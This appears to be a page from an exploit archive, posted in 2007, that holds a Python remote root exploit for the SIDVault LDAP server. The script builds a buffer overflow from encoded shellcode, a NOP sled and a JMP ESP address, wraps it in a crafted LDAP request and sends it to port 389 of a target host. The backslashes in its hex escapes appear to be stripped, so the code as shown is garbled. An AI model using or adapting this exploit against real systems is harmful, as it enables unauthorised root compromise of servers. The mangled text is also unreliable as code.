Home / os / solaris

exploit.py.txt

Posted on 27 August 2007

#!/usr/bin/python """ Alpha Centauri Software SIDVault LDAP Server remote root exploit (0days) """ import sys import socket sc = "xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49" sc += "x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36" sc += "x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34" sc += "x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41" sc += "x56x58x34x5ax38x42x44x4ax4fx4dx41x33x4bx4dx43x35" sc += "x43x44x43x45x4cx56x44x30x4cx46x48x56x4ax45x49x49" sc += "x49x38x41x4ex4dx4cx42x58x48x59x43x44x44x55x48x36" sc += "x4ax36x41x31x4ex35x48x46x43x35x49x58x41x4ex4cx56" sc += "x48x56x4ax55x42x45x41x55x48x35x49x48x41x4ex4dx4c" sc += "x42x48x42x4bx48x46x41x4dx43x4ex4dx4cx42x48x44x35" sc += "x44x55x48x45x43x54x49x38x41x4ex42x4bx48x36x4dx4c" sc += "x42x38x43x39x4cx46x44x30x49x55x42x4bx4fx43x4dx4c" sc += "x42x38x49x54x49x47x49x4fx42x4bx4bx50x44x35x4ax46" sc += "x4fx32x4fx42x43x57x4ax46x4ax36x4fx32x44x56x49x36" sc += "x50x46x49x38x43x4ex44x45x43x35x49x58x41x4ex4dx4c" sc += "x42x48x5a" # # The address we will use is 0xffffe777 (JMP ESP in Ubuntu's linux-gate.so) # addr = "x77xe7xffxff" theLine = 'x90'*2076 + addr+ 'x90'*(2019-len(sc)) + sc pkt = '0x82x10/x02x01x01cx82x10(x04x82x10x06dc=' pkt += theLine pkt += ' x01x02 x01x00x02x01x00x02x01x00x01x01x00x87x0bobjectClass0x00' s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((sys.argv[1], 389)) s.send(pkt) s.close()

 

TOP